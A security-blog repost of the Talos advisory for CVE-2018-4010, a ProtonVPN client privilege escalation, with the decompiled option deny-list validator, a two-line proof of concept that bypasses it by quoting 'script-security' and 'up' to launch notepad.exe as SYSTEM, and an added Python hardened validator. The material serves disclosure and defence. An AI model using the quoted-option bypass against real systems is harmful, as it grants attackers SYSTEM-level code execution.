LinuxSec Exploit
CVE-2018-4010 – ProtonVPN Privilege Escalation

September 10, 2018 by Jack Wilder

An exploitable code execution vulnerability exists in the connect functionality of the ProtonVPN VPN client 1.5.1. A specially crafted configuration file can cause a privilege escalation, resulting in the ability to execute arbitrary commands with the privileges of the SYSTEM service.

  • Authors: Cisco Talos
  • Risk: High
  • CVE: CVE-2018-4010
  • Date: 2018-09-08

Tested Versions

ProtonVPN VPN Client 1.5.1

Product URLs

https://protonvpn.com/download/

Details

The ProtonVPN VPN client is divided into two parts:

  • A GUI that runs with the privileges of the logged-in user.
  • A Windows service that runs as SYSTEM.

The GUI generates an OpenVPN configuration file and asks the service to launch OpenVPN with that configuration file as an argument. Whatever the configuration file tells OpenVPN to do is therefore done as SYSTEM.

In April 2018, security firm VerSprite discovered and released CVE-2018-10169 (https://github.com/VerSprite/research/blob/master/advisories/VS-2018-017.md). To trigger that vulnerability, the attacker adds an option such as "plugin" or "script-security" to the OpenVPN configuration file; the plugin or script is then executed by OpenVPN, which the service runs as SYSTEM.

ProtonVPN published a patch that rejects a configuration file containing the "plugin", "script-security", "up" or "down" options:

using System.IO;

// Decompiled ProtonVPN validator as reproduced in the advisory. The page's HTML
// extraction stripped the angle-bracket tag names out of the string literals; they are
// restored below as the <ca> and <tls-auth> inline blocks that ProtonVPN's generated
// .ovpn files carry (a reconstruction, not checked against the original binary).
public class OpenVpnConfigSecurityValidator
{
    public bool IsValid(string file, out string reason)
    {
        reason = null;
        using (StreamReader streamReader = File.OpenText(file))
        {
            string text;
            while ((text = OpenVpnConfigSecurityValidator.ReadEntry(streamReader)) != null)
            {
                // Inline certificate/key blocks are skipped; every other entry is
                // prefix-matched against a deny-list of options that make OpenVPN
                // run external code.
                if (!text.StartsWithIgnoringCase("<ca>") && !text.StartsWithIgnoringCase("<tls-auth>") && (OpenVpnConfigSecurityValidator.StartsWithName(text, "plugin") || OpenVpnConfigSecurityValidator.StartsWithName(text, "script-security") || OpenVpnConfigSecurityValidator.StartsWithName(text, "up") || OpenVpnConfigSecurityValidator.StartsWithName(text, "down")))
                {
                    reason = string.Format("Invalid configuration file. Reason: {0}", text);
                    return false;
                }
            }
        }
        return true;
    }

    // Returns the next logical entry: a single trimmed line, or a whole
    // <ca>...</ca> / <tls-auth>...</tls-auth> block concatenated into one string.
    private static string ReadEntry(StreamReader stream)
    {
        string text = OpenVpnConfigSecurityValidator.ReadLine(stream);
        if (text == null)
        {
            return null;
        }
        if (OpenVpnConfigSecurityValidator.StartsWithName(text, "<ca>"))
        {
            string text2 = text;
            do
            {
                text = OpenVpnConfigSecurityValidator.ReadLine(stream);
                text2 += text;
            }
            while (!text.StartsWithIgnoringCase("</ca>"));
            return text2;
        }
        if (OpenVpnConfigSecurityValidator.StartsWithName(text, "<tls-auth>"))
        {
            string text3 = text;
            do
            {
                text = OpenVpnConfigSecurityValidator.ReadLine(stream);
                text3 += text;
            }
            while (!text.StartsWithIgnoringCase("</tls-auth>"));
            return text3;
        }
        return text;
    }

    // Reads one line and trims surrounding whitespace.
    private static string ReadLine(StreamReader stream)
    {
        string line = stream.ReadLine();
        if (line == null)
        {
            return null;
        }
        return line.Trim();
    }

    // Matches only a line that begins with the bare option name followed by a
    // space, a tab, or the end of the line. A quoted name such as "up" does not match.
    private static bool StartsWithName(string line, string name)
    {
        return line.StartsWithIgnoringCase(name + " ") || line.StartsWithIgnoringCase(name + "\t") || line.EqualsIgnoringCase(name);
    }
}

Looking at the source code of the parse_line() function of OpenVPN:

  • https://github.com/OpenVPN/openvpn/blob/5961250e776194a411a8dfc1670c5c0c73107bf8/src/openvpn/options.c

we can see that the configuration parser accepts quotation marks around a token and strips them, so "script-security" reaches OpenVPN as the option script-security. The validator, however, only compares the raw line against the bare option names, and a line that begins with a quotation mark matches none of them. Here is a proof of concept that bypasses the validation:

"script-security" 2
"up" C:\\WINDOWS\\system32\\notepad.exe

OpenVPN runs notepad.exe as its "up" command, and because OpenVPN itself was started by the service, notepad.exe runs with SYSTEM privileges.
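The validator above and the quoted proof of concept, as an added Python example (not ProtonVPN's, Talos's or OpenVPN's code): original_is_valid ports the C# prefix check, parse_line is a simplified model of the quote and backslash handling in OpenVPN's parse_line() (a re-implementation of its rules, not OpenVPN's code), and hardened_is_valid tokenises each line the same way OpenVPN will before comparing the first token against the deny-list. The sample configuration is constructed; the <ca>/<tls-auth> block names and all function names are assumptions.

```python
"""Why the quoted PoC slips past ProtonVPN's validator, and a check that does not."""

from typing import Iterator, List, Optional, Tuple

# Options the validator denies because they make OpenVPN execute external code.
FORBIDDEN = ("plugin", "script-security", "up", "down")
# Inline blocks the validator joins into one entry and skips (assumed <ca> and <tls-auth>).
INLINE_BLOCKS = ("ca", "tls-auth")

# Constructed sample configuration carrying the advisory's proof-of-concept lines.
POC_CONFIG = r"""client
dev tun
remote 10.0.0.1 1194
<ca>
-----BEGIN CERTIFICATE-----
plugin inside-an-inline-block-is-data-not-an-option
-----END CERTIFICATE-----
</ca>
"script-security" 2
"up" C:\\WINDOWS\\system32\\notepad.exe
"""


def starts_with_name(line: str, name: str) -> bool:
    """Port of StartsWithName(): bare option name at line start, then whitespace or EOL."""
    low = line.lower()
    return low == name or low.startswith(name + " ") or low.startswith(name + "\t")


def read_entries(text: str) -> Iterator[str]:
    """Port of ReadEntry(): trimmed lines, with <ca>/<tls-auth> blocks joined into one entry."""
    lines = iter(text.splitlines())
    for line in lines:
        line = line.strip()
        for tag in INLINE_BLOCKS:
            if starts_with_name(line, f"<{tag}>"):
                for inner in lines:  # consume up to and including the closing tag
                    inner = inner.strip()
                    line += inner
                    if inner.lower().startswith(f"</{tag}>"):
                        break
                break
        yield line


def original_is_valid(text: str) -> Tuple[bool, Optional[str]]:
    """The shipped check: prefix-match the raw line against the deny-list."""
    for entry in read_entries(text):
        low = entry.lower()
        if low.startswith("<ca>") or low.startswith("<tls-auth>"):
            continue
        if any(starts_with_name(entry, name) for name in FORBIDDEN):
            return False, entry
    return True, None


def parse_line(line: str) -> List[str]:
    """Simplified model of OpenVPN parse_line(): split on whitespace, strip surrounding
    single or double quotes, honour backslash escapes outside single quotes, and stop at
    a '#' or ';' that begins a token. Not OpenVPN's code, only its tokenisation rules."""
    tokens: List[str] = []
    cur: List[str] = []
    quote = None  # the quote character we are currently inside, if any
    in_token = escaped = False
    for ch in line:
        if escaped:
            cur.append(ch)
            escaped = False
            in_token = True
        elif ch == "\\" and quote != "'":
            escaped = True
        elif quote:
            if ch == quote:
                tokens.append("".join(cur))
                cur, quote, in_token = [], None, False
            else:
                cur.append(ch)
        elif ch.isspace():
            if in_token:
                tokens.append("".join(cur))
                cur, in_token = [], False
        elif not in_token and ch in "#;":
            break  # rest of the line is a comment
        elif not in_token and ch in "\"'":
            quote, in_token = ch, True
        else:
            cur.append(ch)
            in_token = True
    if in_token:
        tokens.append("".join(cur))
    return tokens


def hardened_is_valid(text: str) -> Tuple[bool, Optional[str]]:
    """Tokenise each entry as OpenVPN will, then compare the first token to the deny-list."""
    for entry in read_entries(text):
        low = entry.lower()
        if low.startswith("<ca>") or low.startswith("<tls-auth>"):
            continue
        tokens = parse_line(entry)
        if tokens and tokens[0].lower() in FORBIDDEN:
            return False, entry
    return True, None


if __name__ == "__main__":
    print("original validator:", original_is_valid(POC_CONFIG))  # accepted: bypassed
    print("hardened validator:", hardened_is_valid(POC_CONFIG))  # rejected at the quoted line
    for raw in ('"script-security" 2', r'"up" C:\\WINDOWS\\system32\\notepad.exe'):
        print(repr(raw), "->", parse_line(raw))
```

Run as a script, the original check accepts the file while the hardened one rejects it at the "script-security" line, and the tokeniser shows the doubled backslashes in the PoC collapsing to a plain Windows path, which is why the advisory writes them that way. The general lesson is that a deny-list applied to raw text is only as strong as its agreement with the consumer's parser; the robust fix is to parse with the same grammar OpenVPN uses or, better, to allow-list the options the GUI is known to emit and reject everything else.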


Filed Under: Privilege Escalation
